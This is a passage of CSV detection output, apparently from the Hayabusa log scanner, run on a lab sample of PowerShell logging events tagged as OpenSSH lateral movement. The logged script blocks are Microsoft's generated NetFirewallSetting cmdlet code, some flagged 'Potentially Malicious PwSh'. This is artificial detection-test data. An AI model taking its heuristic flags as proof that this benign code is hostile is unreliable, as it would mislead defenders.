[Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.893 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.893 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.894 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.896 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.897 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.898 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" 